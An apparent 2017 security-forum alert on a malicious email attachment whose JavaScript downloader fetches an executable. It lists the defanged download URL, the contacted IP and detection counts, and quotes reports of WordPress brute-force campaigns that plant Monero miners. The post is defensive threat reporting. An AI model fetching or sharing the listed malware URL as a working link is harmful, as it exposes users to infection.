Screenshot: https://myonlinesecu...26_15-28-28.png

CCE26122017_004385.7z: Extracts to: CCE26122017_48779.js - Current Virus total detections 11/58*. Hybrid Analysis**...
This particular version downloads from
 http ://www.thedournalist .com/mnbTREkfDS??jYAbcsB=jYAbcsB (there will normally be 6-8 other download locations)
(VirusTotal 7/68[3])...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1514301126/
CCE26122017_48779.js

** https://www.hybrid-a...vironmentId=100
DNS Requests
86.106.30.37
Contacted Hosts
86.106.30.37

3] https://www.virustot...sis/1514301538/
mnbTREkfDS.exe

thedournalist .com: 86.106.30.37: https://www.virustot...37/information/
___

Massive Brute-Force Attack Infects WordPress Sites with Monero Miners
- https://www.bleeping...-monero-miners/
Dec 20, 2017 - "... WordPress sites around the globe have been the targets of a massive brute-force campaign during which hackers attempted to guess admin account logins in order to install a Monero miner on compromised sites...
Once attackers get in, they install a Monero miner, and they also use the infected site to carry out further brute-force attacks. These two operations don't happen at the same time, and each site is either brute-forcing other WordPress sites or mining Monero..."

WordPress Brute Force Attack Campaign
- https://www.wordfenc...ordpress-attack
Dec 18, 2017 - "A massive distributed brute force attack campaign targeting WordPress sites started this morning at 3am Universal Time, 7pm Pacific Time. The attack is broad in that it uses a large number of attacking IPs, and is also deep in that each IP is generating a huge number of attacks. This is the most aggressive campaign we have seen to date, peaking at over 14 million attacks per hour. The attack campaign was so severe that we had to scale up our logging infrastructure to cope with the volume when it kicked off, which makes it clear that this is the highest volume attack that we have seen in Wordfence history, since 2012..."
___

Remove the Slmgr32.exe Monero CPU Miner
- https://www.bleeping...onero-cpu-miner
Nov 3, 2017
 

   

Edited by AplusWebMaster, 26 December 2017 - 02:16 PM.